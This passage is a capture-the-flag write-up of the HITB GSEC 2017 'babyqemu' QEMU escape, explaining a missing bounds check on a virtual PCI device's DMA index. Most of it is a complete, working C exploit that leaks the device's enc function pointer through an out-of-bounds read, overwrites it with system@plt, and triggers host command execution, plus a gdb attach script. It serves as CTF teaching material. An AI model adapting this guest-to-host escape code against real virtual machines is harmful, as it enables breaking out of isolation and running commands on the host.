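A short sketch of the index arithmetic, together with the kind of check the device is missing. `dma_index` mirrors the decompiled expression `(unsigned int)(LODWORD(src) - 0x40000)`; `dma_range_ok` is purely hypothetical and does not exist in the challenge binary.

```c
#include <stdbool.h>
#include <stdint.h>

#define DMA_BASE     0x40000u
#define DMA_BUF_SIZE 4096u

/* Index computed by the device: low 32 bits of the register minus the base. */
uint32_t dma_index(uint64_t reg)
{
    return (uint32_t)reg - DMA_BASE;
}

/* Hypothetical check the device could have performed before touching dma_buf. */
bool dma_range_ok(uint64_t reg, uint64_t cnt)
{
    uint32_t idx = dma_index(reg);
    return idx < DMA_BUF_SIZE && cnt <= DMA_BUF_SIZE - idx;
}
```

An address of 0x41000 yields index 0x1000, one byte past the end of the 4096-byte buffer, and an address just below the base wraps around to a huge index. Both would be rejected by a check like this one.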





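The structure found earlier also shows that dma_buf is only 4096 bytes long and is immediately followed by enc, which holds a function pointer that the device calls back. The exploitation plan is therefore: use the out-of-bounds read to leak the function address stored in enc, overwrite it with the address of system@plt, and finally write cat flag\x00 into dma_buf and trigger enc to get the flag.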
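The two calculations behind this plan can be sketched as follows. `struct hitb_tail` is a simplified stand-in for the end of HitbState, not the real structure, and the helper names are mine. The two offsets are the ones used in the exploit in this post and are specific to this challenge binary.

```c
#include <stddef.h>
#include <stdint.h>

/* Simplified stand-in for the tail of HitbState. */
struct hitb_tail {
    char dma_buf[4096];
    void (*enc)(char *, unsigned int);
    uint64_t dma_mask;
};

#define DMA_BASE          0x40000u
#define ENC_OFFSET        0x283DD0u  /* enc function offset in this binary */
#define SYSTEM_PLT_OFFSET 0x1FDB18u  /* system@plt offset in this binary */

/* DMA "address" that makes the unchecked index land on the enc pointer. */
uint32_t dma_addr_of_enc(void)
{
    return DMA_BASE + (uint32_t)(offsetof(struct hitb_tail, enc) -
                                 offsetof(struct hitb_tail, dma_buf));
}

/* Rebase: leaked enc pointer -> image base -> system@plt. */
uint64_t system_plt_from_leak(uint64_t leaked_enc)
{
    uint64_t base = leaked_enc - ENC_OFFSET;
    return base + SYSTEM_PLT_OFFSET;
}
```

`dma_addr_of_enc()` evaluates to 0x41000, which is the `0x1000 + DMABASE` value the exploit reads from and writes to.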

exp

```c
#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/io.h>

#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT)

void die(const char *msg)
{
    perror(msg);
    exit(-1);
}

/* Translate a virtual address to a physical address via /proc/self/pagemap. */
size_t va2pa(void *addr)
{
    uint64_t data;

    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0) {   /* open() returns -1 on failure, not 0 */
        perror("open pagemap");
        return 0;
    }

    size_t offset = ((uintptr_t)addr / PAGE_SIZE) * sizeof(uint64_t);

    if (lseek(fd, offset, SEEK_SET) < 0) {
        puts("lseek");
        close(fd);
        return 0;
    }

    if (read(fd, &data, 8) != 8) {
        puts("read");
        close(fd);
        return 0;
    }

    if (!(data & (((uint64_t)1 << 63)))) {
        puts("page");
        close(fd);
        return 0;
    }

    size_t pageframenum = data & ((1ull << 55) - 1);
    size_t phyaddr = pageframenum * PAGE_SIZE + (uintptr_t)addr % PAGE_SIZE;

    close(fd);

    return phyaddr;
}

#define DMABASE 0x40000
char *userbuf;
uint64_t phy_userbuf;
unsigned char *mmio_mem;

void mmio_write(uint32_t addr, uint32_t value)
{
    *((uint32_t *)(mmio_mem + addr)) = value;
}

uint32_t mmio_read(uint32_t addr)
{
    return *((uint32_t *)(mmio_mem + addr));
}

void dma_set_src(uint32_t src_addr)
{
    mmio_write(0x80, src_addr);
}

void dma_set_dst(uint32_t dst_addr)
{
    mmio_write(0x88, dst_addr);
}

void dma_set_cnt(uint32_t cnt)
{
    mmio_write(0x90, cnt);
}

void dma_do_cmd(uint32_t cmd)
{
    mmio_write(0x98, cmd);
}

/* Copy len bytes from buf into the device at DMA address addr (cmd = 1). */
void dma_do_write(uint32_t addr, void *buf, size_t len)
{
    memcpy(userbuf, buf, len);

    dma_set_src(phy_userbuf);
    dma_set_dst(addr);
    dma_set_cnt(len);
    dma_do_cmd(0 | 1);

    sleep(1);   /* wait for the DMA timer to fire */
}

/* Copy len bytes from the device at DMA address addr into userbuf (cmd = 3). */
void dma_do_read(uint32_t addr, size_t len)
{
    dma_set_dst(phy_userbuf);
    dma_set_src(addr);
    dma_set_cnt(len);

    dma_do_cmd(2 | 1);

    sleep(1);   /* wait for the DMA timer to fire */
}

/* Trigger enc on the device buffer at DMA address addr (cmd = 7). */
void dma_do_enc(uint32_t addr, size_t len)
{
    dma_set_src(addr);
    dma_set_cnt(len);

    dma_do_cmd(1 | 4 | 2);
}

int main()
{
    int mmio_fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC);
    if (mmio_fd == -1)
        die("mmio_fd open failed");

    mmio_mem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    if (mmio_mem == MAP_FAILED)
        die("mmap mmio_mem failed");

    printf("mmio_mem @ %p\n", mmio_mem);

    userbuf = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    if (userbuf == MAP_FAILED)
        die("mmap");

    mlock(userbuf, 0x1000);
    phy_userbuf = va2pa(userbuf);

    printf("user buff virtual address: %p\n", userbuf);
    printf("user buff physical address: %p\n", (void *)phy_userbuf);

    /* Out-of-bounds read: enc sits right after the 0x1000-byte dma_buf. */
    dma_do_read(0x1000 + DMABASE, 8);

    uint64_t leak_enc = *(uint64_t *)userbuf;
    printf("leaking enc function: %p\n", (void *)leak_enc);

    uint64_t pro_base = leak_enc - 0x283DD0;
    uint64_t system_plt = pro_base + 0x1FDB18;

    /* Out-of-bounds write: replace enc with system@plt. */
    dma_do_write(0x1000 + DMABASE, &system_plt, 8);

    char *command = "cat flag\x00";
    dma_do_write(0x200 + DMABASE, command, strlen(command));

    /* enc(&dma_buf[0x200], cnt) now calls system("cat flag"). */
    dma_do_enc(0x200 + DMABASE, 8);

    return 0;
}
```

Debugging script:

```bash
#!/bin/bash
pid=`ps -aux | grep "qemu-system-x86_64" | grep -v "grep" | awk '{print($2)}'`

sudo gdb \
    -ex "file qemu-system-x86_64" \
    -ex "attach $pid" \
    -ex "b*\$rebase(0x284191)"
```

Challenge files: https://github.com/196082/196082/blob/main/qemu_escape/HITB%20GSEC2017_babyqemu.tar.gz

References:

https://www.anquanke.com/post/id/224199#h3-5

https://ray-cp.github.io/archivers/qemu-pwn-hitb-gesc-2017-babyqemu-writeup

https://ray-cp.github.io/archivers/qemu-pwn-basic-knowledge#%E8%AE%BF%E9%97%AEmmio